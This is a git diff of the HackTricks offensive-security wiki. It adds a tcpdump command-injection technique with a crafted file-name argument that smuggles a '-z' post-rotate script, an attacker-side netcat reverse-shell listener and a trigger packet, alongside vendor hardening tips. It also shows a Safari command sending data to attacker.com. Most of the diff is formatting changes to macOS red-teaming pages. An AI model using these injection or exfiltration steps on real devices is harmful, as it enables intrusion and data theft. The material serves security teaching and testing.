unsafe "file name" field +/debug/tcpdump --filter="udp port 1234" \ + --file-name="test -i any -W 1 -G 1 -z /mnt/disk1_1/rce.sh" + +# On the attacker host +nc -6 -lvnp 4444 & +# Then send any packet that matches the BPF to force a rotation +printf x | nc -u -6 [victim_ipv6] 1234 +``` + +Details: + +- `-G 1 -W 1` forces an immediate rotate after the first matching packet. +- `-z ` runs the post-rotate command once per rotation. Many builds execute ` `. If `` is a script/interpreter, ensure the argument handling matches your payload. + +No-removable-media variants: + +- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /bin/sh /path/script.sh` or `-z /path/script.sh` depending on platform semantics. +- Some vendor wrappers rotate to attacker-controllable locations. If you can influence the rotated path (symlink/directory traversal), you can steer `-z` to execute content you fully control without external media. + +Hardening tips for vendors: + +- Never pass user-controlled strings directly to `tcpdump` (or any tool) without strict allowlists. Quote and validate. +- Do not expose `-z` functionality in wrappers; run tcpdump with a fixed safe template and disallow extra flags entirely. +- Drop tcpdump privileges (cap_net_admin/cap_net_raw only) or run under a dedicated unprivileged user with AppArmor/SELinux confinement. + + ## Detection & Hardening 1. **Disable shell globbing** in critical scripts: `set -f` (`set -o noglob`) prevents wildcard expansion. @@ -134,5 +180,7 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che * Elastic Security – Potential Shell via Wildcard Injection Detected rule (last updated 2025) * Rutger Flohil – “macOS — Tar wildcard injection” (Dec 18 2024) +* GTFOBins – [tcpdump](https://gtfobins.github.io/gtfobins/tcpdump/) +* FiberGateway GR241AG – [Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md index d445b0599..1fd493336 100644 --- a/src/macos-hardening/macos-red-teaming/README.md +++ b/src/macos-hardening/macos-red-teaming/README.md @@ -12,6 +12,7 @@ If you manage to **compromise admin credentials** to access the management platf For red teaming in MacOS environments it's highly recommended to have some understanding of how the MDMs work: + {{#ref}} macos-mdm/ {{#endref}} @@ -99,6 +100,7 @@ The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-T And also about **MacOS** "special" **network** **protocols**: + {{#ref}} ../macos-security-and-privilege-escalation/macos-protocols.md {{#endref}} @@ -107,14 +109,17 @@ And also about **MacOS** "special" **network** **protocols**: In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: + {{#ref}} ../../network-services-pentesting/pentesting-ldap.md {{#endref}} + {{#ref}} ../../windows-hardening/active-directory-methodology/ {{#endref}} + {{#ref}} ../../network-services-pentesting/pentesting-kerberos-88/ {{#endref}} @@ -223,6 +228,7 @@ mount -t smbfs //server/folder /local/mount/point The Keychain highly probably contains sensitive information that if accessed without generating a prompt could help to move forward a red team exercise: + {{#ref}} macos-keychain.md {{#endref}} @@ -251,4 +257,3 @@ When a file is downloaded in Safari, if its a "safe" file, it will be **automati {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md index abc9788fb..cf2d45a84 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -77,6 +77,7 @@ It's crucial to note that the ease of enrollment provided by DEP, while benefici Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**. + {{#ref}} macos-serial-number.md {{#endref}} @@ -196,6 +197,7 @@ Typically, **activation profile** provided by an MDM vendor will **include the f As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: + {{#ref}} enrolling-devices-in-other-organisations.md {{#endref}} @@ -203,4 +205,3 @@ enrolling-devices-in-other-organisations.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/README.md index 20a76642a..5738286f5 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -8,30 +8,35 @@ If you are not familiar with macOS, you should start learning the basics of macO - Special macOS **files & permissions:** + {{#ref}} macos-files-folders-and-binaries/ {{#endref}} - Common macOS **users** + {{#ref}} macos-users.md {{#endref}} - **AppleFS** + {{#ref}} macos-applefs.md {{#endref}} - The **architecture** of the k**ernel** + {{#ref}} mac-os-architecture/ {{#endref}} - Common macOS n**etwork services & protocols** + {{#ref}} macos-protocols.md {{#endref}} @@ -43,18 +48,21 @@ macos-protocols.md In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**: + {{#ref}} ../macos-red-teaming/macos-mdm/ {{#endref}} ### MacOS - Inspecting, Debugging and Fuzzing + {{#ref}} macos-apps-inspecting-debugging-and-fuzzing/ {{#endref}} ## MacOS Security Protections + {{#ref}} macos-security-protections/ {{#endref}} @@ -75,6 +83,7 @@ Being able to **create a file** that is going to be **used by root**, allows a u For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**: + {{#ref}} macos-files-folders-and-binaries/macos-installers-abuse.md {{#endref}} @@ -83,6 +92,7 @@ macos-files-folders-and-binaries/macos-installers-abuse.md Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols + {{#ref}} macos-file-extension-apps.md {{#endref}} @@ -101,6 +111,7 @@ Follow these links to find different was to [**escalate privileges in TCC**](mac Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints: + {{#ref}} macos-privilege-escalation.md {{#endref}} @@ -120,4 +131,3 @@ macos-privilege-escalation.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index 4280561a8..e9e66db34 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -35,12 +35,14 @@ Moreover, **Mach and BSD each maintain different security models**: **Mach's** s The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. + {{#ref}} macos-iokit.md {{#endref}} ### IPC - Inter Process Communication + {{#ref}} ../macos-proces-abuse/macos-ipc-inter-process-communication/ {{#endref}} @@ -51,6 +53,7 @@ macOS is **super restrictive to load Kernel Extensions** (.kext) because of the In the following page you can also see how to recover the `.kext` that macOS loads inside its **kernelcache**: + {{#ref}} macos-kernel-extensions.md {{#endref}} @@ -59,6 +62,7 @@ macos-kernel-extensions.md Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions. + {{#ref}} macos-system-extensions.md {{#endref}} @@ -71,4 +75,3 @@ macos-system-extensions.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md index f5f7102ce..7199ef495 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md @@ -250,6 +250,7 @@ int main() { You can grab a shellcode from: + {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -524,6 +525,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_ You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): + {{#ref}} ../../macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -814,6 +816,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector In this technique a thread of the process is hijacked: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md {{#endref}} @@ -826,6 +829,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication For more information about how this **communication work** on how it **could be vulnerable** check: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/ {{#endref}} @@ -836,6 +840,7 @@ MIG was created to **simplify the process of Mach IPC** code creation. It basica For more info check: + {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md {{#endref}} @@ -851,4 +856,3 @@ For more info check: {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md index 8160e7990..38945205e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md @@ -138,6 +138,7 @@ The params this function expects are: See how to **get this info easily with `lldb` in ARM64** in this page: + {{#ref}} arm64-basic-assembly.md {{#endref}} @@ -557,6 +558,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist **Checkout the following page** to find out how you can find which app is responsible of **handling the specified scheme or protocol:** + {{#ref}} ../macos-file-extension-apps.md {{#endref}} @@ -635,4 +637,3 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md index 54c07417b..bea7bf252 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md @@ -75,6 +75,7 @@ open -j -a Safari "https://attacker.com?data=data%20to%20exfil" If you can **inject code into a process** that is allowed to connect to any server you could bypass the firewall protections: + {{#ref}} macos-proces-abuse/ {{#endref}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index 27cb6f957..aff6ed64a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -35,12 +35,14 @@ MacOS stores information such as passwords in several places: + {{#ref}} macos-sensitive-locations.md {{#endref}} ### Vulnerable pkg installers + {{#ref}} macos-installers-abuse.md {{#endref}} @@ -69,6 +71,7 @@ macos-installers-abuse.md A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files). + {{#ref}} macos-bundles.md {{#endref}} @@ -235,6 +238,7 @@ The tool afscexpand can be used to force decompress a dile. Mac OS binaries usually are compiled as **universal binaries**. A **universal binary** can **support multiple architectures in the same file**. + {{#ref}} universal-binaries-and-mach-o-format.md {{#endref}} @@ -243,6 +247,7 @@ universal-binaries-and-mach-o-format.md ## macOS memory dumping + {{#ref}} macos-memory-dumping.md {{#endref}} @@ -270,4 +275,3 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/ {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index 66f65d692..c9309a9ad 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -6,6 +6,7 @@ If you came here looking for TCC privilege escalation go to: + {{#ref}} macos-security-protections/macos-tcc/ {{#endref}} @@ -14,6 +15,7 @@ macos-security-protections/macos-tcc/ Please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see: + {{#ref}} ../../linux-hardening/privilege-escalation/ {{#endref}} @@ -240,6 +242,7 @@ A more detailed explanation can be [**found in the original report**](https://th This can be useful to escalate privileges: + {{#ref}} macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}} @@ -247,4 +250,3 @@ macos-files-folders-and-binaries/macos-sensitive-locations.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 172e77dba..a9559a2e4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -151,6 +151,7 @@ MacOS, like any other operating system, provides a variety of methods and mechan Library Injection is a technique wherein an attacker **forces a process to load a malicious library**. Once injected, the library runs in the context of the target process, providing the attacker with the same permissions and access as the process. + {{#ref}} macos-library-injection/ {{#endref}} @@ -159,6 +160,7 @@ macos-library-injection/ Function Hooking involves **intercepting function calls** or messages within a software code. By hooking functions, an attacker can **modify the behavior** of a process, observe sensitive data, or even gain control over the execution flow. + {{#ref}} macos-function-hooking.md {{#endref}} @@ -167,6 +169,7 @@ macos-function-hooking.md Inter Process Communication (IPC) refers to different methods by which separate processes **share and exchange data**. While IPC is fundamental for many legitimate applications, it can also be misused to subvert process isolation, leak sensitive information, or perform unauthorized actions. + {{#ref}} macos-ipc-inter-process-communication/ {{#endref}} @@ -175,6 +178,7 @@ macos-ipc-inter-process-communication/ Electron applications executed with specific env variables could be vulnerable to process injection: + {{#ref}} macos-electron-applications-injection.md {{#endref}} @@ -183,6 +187,7 @@ macos-electron-applications-injection.md It's possible to use the flags `--load-extension` and `--use-fake-ui-for-media-stream` to perform a **man in the browser attack** allowing to steal keystrokes, traffic, cookies, inject scripts in pages...: + {{#ref}} macos-chromium-injection.md {{#endref}} @@ -191,6 +196,7 @@ macos-chromium-injection.md NIB files **define user interface (UI) elements** and their interactions within an application. However, they can **execute arbitrary commands** and **Gatekeeper doesn't stop** an already executed application from being executed if a **NIB file is modified**. Therefore, they could be used to make arbitrary programs execute arbitrary commands: + {{#ref}} macos-dirty-nib.md {{#endref}} @@ -199,6 +205,7 @@ macos-dirty-nib.md It's possible to abuse certain java capabilities (like the **`_JAVA_OPTS`** env variable) to make a java application execute **arbitrary code/commands**. + {{#ref}} macos-java-apps-injection.md {{#endref}} @@ -207,6 +214,7 @@ macos-java-apps-injection.md It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtime hardening). + {{#ref}} macos-.net-applications-injection.md {{#endref}} @@ -215,6 +223,7 @@ macos-.net-applications-injection.md Check different options to make a Perl script execute arbitrary code in: + {{#ref}} macos-perl-applications-injection.md {{#endref}} @@ -223,6 +232,7 @@ macos-perl-applications-injection.md I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code: + {{#ref}} macos-ruby-applications-injection.md {{#endref}} @@ -276,4 +286,3 @@ Note that to call that function you need to be **the same uid** as the one runni {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md index 36672d73d..bda3e8dcf 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/README.md @@ -534,6 +534,7 @@ Any thread can get this port calling to **`mach_thread_sef`**. You can grab a shellcode from: + {{#ref}} ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -814,6 +815,7 @@ Therefore, to **improve the thread** it should call **`pthread_create_from_mach_ You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): + {{#ref}} ../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -1104,6 +1106,7 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector In this technique a thread of the process is hijacked: + {{#ref}} macos-thread-injection-via-task-port.md {{#endref}} @@ -1258,6 +1261,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication For more information about how this **communication work** on how it **could be vulnerable** check: + {{#ref}} macos-xpc/ {{#endref}} @@ -1270,6 +1274,7 @@ MIC basically **generates the needed code** for server and client to communicate For more info check: + {{#ref}} macos-mig-mach-interface-generator.md {{#endref}} @@ -1287,4 +1292,3 @@ macos-mig-mach-interface-generator.md {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md index a20a23073..a42b8516f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md @@ -126,6 +126,7 @@ Applications can **subscribe** to different event **messages**, enabling them to When a process tries to call a method from via an XPC connection, the **XPC service should check if that process is allowed to connect**. Here are the common ways to check that and the common pitfalls: + {{#ref}} macos-xpc-connecting-process-check/ {{#endref}} @@ -134,6 +135,7 @@ macos-xpc-connecting-process-check/ Apple also allows apps to **configure some rights and how to get them** so if the calling process have them it would be **allowed to call a method** from the XPC service: + {{#ref}} macos-xpc-authorization.md {{#endref}} @@ -486,4 +488,3 @@ It's possible to find thee communications using `netstat`, `nettop` or the open {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md index a91d747b4..b8ede1328 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md @@ -31,6 +31,7 @@ An example could be found in [EvenBetterAuthorizationSample](https://github.com/ For more information about how to properly configure this check: + {{#ref}} macos-xpc-connecting-process-check/ {{#endref}} @@ -442,4 +443,3 @@ int main(void) { {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index 2279ec6cb..7fe7c67a6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md @@ -26,12 +26,14 @@ When a connection is stablished to an XPC service, the server will check if the For more information about the PID reuse attack check: + {{#ref}} macos-pid-reuse.md {{#endref}} For more information **`xpc_connection_get_audit_token`** attack check: + {{#ref}} macos-xpc_connection_get_audit_token-attack.md {{#endref}} @@ -95,4 +97,3 @@ if ((csFlags & (cs_hard | cs_require_lv)) { {{#include ../../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index 968740441..4ee3d0353 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md @@ -8,6 +8,7 @@ If you don't know what Mach Messages are start checking this page: + {{#ref}} ../../ {{#endref}} @@ -19,6 +20,7 @@ Mach messages are sent over a _mach port_, which is a **single receiver, multipl If you don't know how a XPC connection is established check: + {{#ref}} ../ {{#endref}} @@ -125,4 +127,3 @@ Below is a visual representation of the described attack scenario: {{#include ../../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index 3f0ec0dae..589ffaae1 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md @@ -9,6 +9,7 @@ Take a look on how Dyld loads libraries inside binaries in: + {{#ref}} macos-dyld-process.md {{#endref}} @@ -50,6 +51,7 @@ You can also load a library if it's **signed with the same certificate as the bi Find a example on how to (ab)use this and check the restrictions in: + {{#ref}} macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -108,6 +110,7 @@ The way to **escalate privileges** abusing this functionality would be in the ra **Example** + {{#ref}} macos-dyld-hijacking-and-dyld_insert_libraries.md {{#endref}} @@ -339,4 +342,3 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md index eba5f10fd..9ab75e67d 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md @@ -19,6 +19,7 @@ Dyld will be loaded by **`dyldboostrap::start`**, which will also load things su **`dyls::_main()`** is the entry point of dyld and it's first task is to run `configureProcessRestrictions()`, which usually restricts **`DYLD_*`** environment variables explained in: + {{#ref}} ./ {{#endref}} @@ -316,4 +317,3 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index 96f888304..8dd4b68bb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md @@ -8,6 +8,7 @@ Gatekeeper is usually used to refer to the combination of **Quarantine + Gatekee More information in: + {{#ref}} macos-gatekeeper.md {{#endref}} @@ -18,6 +19,7 @@ macos-gatekeeper.md ### SIP - System Integrity Protection + {{#ref}} macos-sip.md {{#endref}} @@ -26,6 +28,7 @@ macos-sip.md MacOS Sandbox **limits applications** running inside the sandbox to the **allowed actions specified in the Sandbox profile** the app is running with. This helps to ensure that **the application will be accessing only expected resources**. + {{#ref}} macos-sandbox/ {{#endref}} @@ -34,6 +37,7 @@ macos-sandbox/ **TCC (Transparency, Consent, and Control)** is a security framework. It's designed to **manage the permissions** of applications, specifically by regulating their access to sensitive features. This includes elements like **location services, contacts, photos, microphone, camera, accessibility, and full disk access**. TCC ensures that apps can only access these features after obtaining explicit user consent, thereby bolstering privacy and control over personal data. + {{#ref}} macos-tcc/ {{#endref}} @@ -42,6 +46,7 @@ macos-tcc/ Launch constraints in macOS are a security feature to **regulate process initiation** by defining **who can launch** a process, **how**, and **from where**. Introduced in macOS Ventura, they categorize system binaries into constraint categories within a **trust cache**. Every executable binary has set **rules** for its **launch**, including **self**, **parent**, and **responsible** constraints. Extended to third-party apps as **Environment** Constraints in macOS Sonoma, these features help mitigate potential system exploitations by governing process launching conditions. + {{#ref}} macos-launch-environment-constraints.md {{#endref}} @@ -145,4 +150,3 @@ References and **more information about BTM**: {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index 68320b06b..72de19ae6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -160,6 +160,7 @@ ls -le test Not really needed but I leave it there just in case: + {{#ref}} macos-xattr-acls-extra-stuff.md {{#endref}} @@ -469,4 +470,3 @@ This feature is particularly useful for preventing certain classes of security v {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md index b0a12e881..a6c1c6824 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md @@ -287,6 +287,7 @@ On macOS, unlike iOS where processes are sandboxed from the start by the kernel, Processes are automatically Sandboxed from userland when they start if they have the entitlement: `com.apple.security.app-sandbox`. For a detailed explanation of this process check: + {{#ref}} macos-sandbox-debug-and-bypass/ {{#endref}} @@ -401,4 +402,3 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple. {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 431cc6ffb..53ebae74f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -30,6 +30,7 @@ This is what was done in [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023 In the [**last examples of Word sandbox bypass**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) can be appreciated how the **`open`** cli functionality could be abused to bypass the sandbox. + {{#ref}} macos-office-sandbox-bypasses.md {{#endref}} @@ -47,6 +48,7 @@ For this you might even need **2 steps**: To make a process with a **more permis Check this page about **Auto Start locations**: + {{#ref}} ../../../../macos-auto-start-locations.md {{#endref}} @@ -55,6 +57,7 @@ Check this page about **Auto Start locations**: If from then sandbox process you are able to **compromise other processes** running in less restrictive sandboxes (or none), you will be able to escape to their sandboxes: + {{#ref}} ../../../macos-proces-abuse/ {{#endref}} @@ -270,6 +273,7 @@ Note that even if some **actions** might be **allowed by at he sandbox** if an a For more information about **Interposting** check: + {{#ref}} ../../../macos-proces-abuse/macos-function-hooking.md {{#endref}} @@ -501,4 +505,3 @@ Process 2517 exited with status = 0 (0x00000000) {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md index 961615f30..e7f47a24a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md @@ -330,6 +330,7 @@ INSERT INTO access ( If you managed to get inside an app with some TCC permissions check the following page with TCC payloads to abuse them: + {{#ref}} macos-tcc-payloads.md {{#endref}} @@ -338,6 +339,7 @@ macos-tcc-payloads.md Learn about Apple Events in: + {{#ref}} macos-apple-events.md {{#endref}} @@ -590,6 +592,7 @@ AllowApplicationsList.plist: ### TCC Bypasses + {{#ref}} macos-tcc-bypasses/ {{#endref}} @@ -604,4 +607,3 @@ macos-tcc-bypasses/ {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md 